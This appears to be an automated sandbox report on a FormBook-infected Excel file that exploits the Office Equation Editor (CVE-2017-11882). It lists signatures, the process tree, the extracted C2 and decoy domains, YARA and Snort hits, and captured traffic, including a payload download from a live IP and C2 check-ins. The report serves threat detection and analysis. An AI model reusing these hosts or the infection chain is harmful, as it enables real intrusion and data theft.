Windows Analysis Report OCT 13 2021 - PRINT COPY.xlsx

Overview

General Information

Sample Name: OCT 13 2021 - PRINT COPY.xlsx
Analysis ID: 502343
MD5: 5c546d999e38e6e51a6c1675b3a646f3
SHA1: 39ce280bc35b7cc313cbaed2476ee300d7e928c3
SHA256: 980e889b97c92e9a81ff548a481978ad5c2b42829ddb6014d3720c19772e3799
Tags: Formbook, VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Performs DNS queries to domains with low reputation
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1912 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2676 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2628 cmdline: 'C:\Users\Public\vbc.exe' MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
      • vbc.exe (PID: 1988 cmdline: C:\Users\Public\vbc.exe MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • cmd.exe (PID: 2724 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
            • cmd.exe (PID: 1412 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fis.photos/ef6c/"], "decoy": ["gicaredocs.com", "govusergroup.com", "conversationspit.com", "brondairy.com", "rjtherealest.com", "xn--9m1bq8wgkag3rjvb.com", "mylori.net", "softandcute.store", "ahljsm.com", "shacksolid.com", "weekendmusecollection.com", "gaminghallarna.net", "pgonline111.online", "44mpt.xyz", "ambrandt.com", "eddytattoo.com", "blendeqes.com", "upinmyfeels.com", "lacucinadesign.com", "docomoau.xyz", "xn--90armbk7e.online", "xzq585858.net", "kidzgovroom.com", "lhznqyl.press", "publicationsplace.com", "jakante.com", "csspadding.com", "test-testjisdnsec.store", "lafabriqueabeilleassurances.com", "clf010.com", "buybabysnuggle.com", "uzmdrmustafaalperaykanat.com", "levanttradegroup.com", "arcflorals.com", "kinglot2499.com", "freekagyans.com", "region10group.gmbh", "yeyelm744.com", "thehomedesigncentre.com", "vngc.xyz", "szesdkj.com", "charlottewright.online", "planetgreennetwork.com", "pacifica7.com", "analogueadapt.com", "sensorypantry.com", "narbaal.com", "restaurant-utopia.xyz", "golnay.com", "szyyglass.com", "redelirevearyseuiop.xyz", "goldsteelconstruction.com", "discovercotswoldcottages.com", "geniuseven.net", "apricitee.com", "stopmoshenik.online", "ya2gh.com", "instatechnovelz.com", "dbe648.com", "seifjuban.com", "conquershirts.store", "totalcovidtravel.com", "pamperotrabajo.com", "satellitphonestore.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.vbc.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.vbc.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
5.2.vbc.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
4.2.vbc.exe.3354b60.5.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.vbc.exe.3354b60.5.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

Exploits:

Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2676, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\deo[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2628
Sigma detected: Execution from Suspicious Folder
Source: Process started, Author: Florian Roth, Data: Command: 'C:\Users\Public\vbc.exe', CommandLine: 'C:\Users\Public\vbc.exe', CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2676, ProcessCommandLine: 'C:\Users\Public\vbc.exe', ProcessId: 2628

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration)
Multi AV Scanner detection for submitted file
Source: OCT 13 2021 - PRINT COPY.xlsx, ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match, File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://18.197.254.181/www1/deo.exe, Avira URL Cloud: Label: malware
Source: www.fis.photos/ef6c/, Avira URL Cloud: Label: malware
Source: http://www.upinmyfeels.com/ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV, Avira URL Cloud: Label: malware
Source: http://www.restaurant-utopia.xyz/ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV, Avira URL Cloud: Label: phishing
Source: 5.2.vbc.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: cmd.pdb,$ source: vbc.exe, 00000005.00000003.539428502.00000000004AC000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, cmd.exe
Source: Binary string: cmd.pdb source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe
Source: Binary string: cmd.pdb,$uJ6$uJ@$uJ source: vbc.exe, 00000005.00000003.539476945.00000000004EA000.00000004.00000001.sdmp, cmd.exe, 00000007.00000000.540165675.000000004A730000.00000040.00020000.sdmp
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 7_2_4A732E73 FindFirstFileExW,GetLastError,FindClose,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,7_2_4A732E73
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 7_2_4A736E47 GetFileAttributesW,FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,7_2_4A736E47
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 7_2_4A750202 FindFirstFileW,GetFullPathNameW,RemoveDirectoryW,RemoveDirectoryW,GetLastError,GetLastError,GetFileAttributesW,SetFileAttributesW,RemoveDirectoryW,GetLastError,7_2_4A750202
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 7_2_4A74BF0C FindFirstFileW,FindNextFileW,FindClose,7_2_4A74BF0C
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 7_2_4A73BBA4 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,FindNextFileW,GetLastError,FindClose,7_2_4A73BBA4
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 7_2_4A750492 FindFirstFileW,FindFirstFileW,FindClose,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetLastError,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,FindNextFileW,FindClose,7_2_4A750492
Source: global traffic, DNS query: name: www.ahljsm.com
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop ebx, 5_2_00406ABB
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 5_2_0040C37C
Source: C:\Users\Public\vbc.exe, Code function: 4x nop then pop edi, 5_2_0040C3E9
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 4x nop then pop ebx, 7_2_00086ABB
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 4x nop then pop edi, 7_2_0008C37C
Source: C:\Windows\SysWOW64\cmd.exe, Code function: 4x nop then pop edi, 7_2_0008C3E9
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 18.197.254.181:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49170 -> 34.102.136.180:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 172.67.213.229:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 172.67.213.229:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49171 -> 172.67.213.229:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Network Connect: 108.170.14.102 80
Source: C:\Windows\explorer.exe, Domain query: www.dbe648.com
Source: C:\Windows\explorer.exe, Domain query: www.lacucinadesign.com
Source: C:\Windows\explorer.exe, Network Connect: 45.39.212.162 80
Source: C:\Windows\explorer.exe, Domain query: www.upinmyfeels.com
Source: C:\Windows\explorer.exe, Domain query: www.publicationsplace.com
Source: C:\Windows\explorer.exe, Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe, Domain query: www.ahljsm.com
Performs DNS queries to domains with low reputation
Source: DNS query: www.restaurant-utopia.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.fis.photos/ef6c/
Source: Joe Sandbox View, ASN Name: SSASN2US SSASN2US
Source: global traffic, HTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== HTTP/1.1 | Host: www.ahljsm.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV HTTP/1.1 | Host: www.publicationsplace.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV HTTP/1.1 | Host: www.upinmyfeels.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== HTTP/1.1 | Host: www.lacucinadesign.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: GET /ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV HTTP/1.1 | Host: www.restaurant-utopia.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OK | Date: Wed, 13 Oct 2021 18:15:52 GMT | Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.7 | Last-Modified: Wed, 13 Oct 2021 09:32:48 GMT | ETag: "73c00-5ce38a52a9832" | Accept-Ranges: bytes | Content-Length: 474112 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
Source: global traffic, HTTP traffic detected: GET /www1/deo.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: 18.197.254.181 | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 13 Oct 2021 18:17:12 GMT | Server: Apache/2.2.15 (CentOS) | Content-Length: 203 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ef6c/ was not found on this server.</p></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 18:17:25 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61672139-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Wed, 13 Oct 2021 18:17:30 GMT | Content-Type: text/html | Content-Length: 275 | ETag: "61672139-113" | Via: 1.1 google | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: unknown, TCP traffic detected without corresponding DNS query: 18.197.254.181
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29DF0F06.emf
          Source: unknownDNS traffic detected: queries for: www.ahljsm.com
          Source: global trafficHTTP traffic detected: GET /www1/deo.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 18.197.254.181Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=IVc4rtgLgg2h/YWyhQBU9em9uNea1MXNkTy/UnYOuL+WBS8ayE+K1FYcvarTJ+yNk0kAEg== HTTP/1.1Host: www.ahljsm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ef6c/?pVE8Yvg8=69obzrOt3jvlXYYQLOBGpgM4gb/C38tuSyxXcmdwhPVCiSErrrcVtL+HOCZM5DtjL+Sksg==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.publicationsplace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ef6c/?pVE8Yvg8=qu0EmkGaX3geOx6lIkkYY+FXQg5rkMbAIJtI6DFSABpZ5nF28boqJyWYwUc9r+BjHdgUhg==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.upinmyfeels.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ef6c/?OHT=xjWx_NuP96LhBV&pVE8Yvg8=9TcXST3pnWOFoH1gaAmWVPk3OXoAybXjykt4lIGhEDNMUFCSIfL5p15n/WQr7vtpGgJ17Q== HTTP/1.1Host: www.lacucinadesign.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ef6c/?pVE8Yvg8=QQd8BU9Cv5cEIYl4k4pKDxcRFm34j4nz3hSoRKYyqec7FRTFu3B5N6xNIoSikzbYbjb12w==&OHT=xjWx_NuP96LhBV HTTP/1.1Host: www.restaurant-utopia.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.330a940.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.684319508.0000000000190000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.540691245.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.508839358.0000000007FF5000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.478550746.00000000031E9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.684245712.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.540662107.00000000003D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.500540075.0000000007FF5000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.684466431.00000000005A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.540476989.0000000000080000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
          Source: Screenshot number: 8Screenshot OCR: enable Editing and Cont&t from the Yellow bar 19 above to view locked content. 20 21 22 23 24
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\deo[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exe
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.3354b60.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
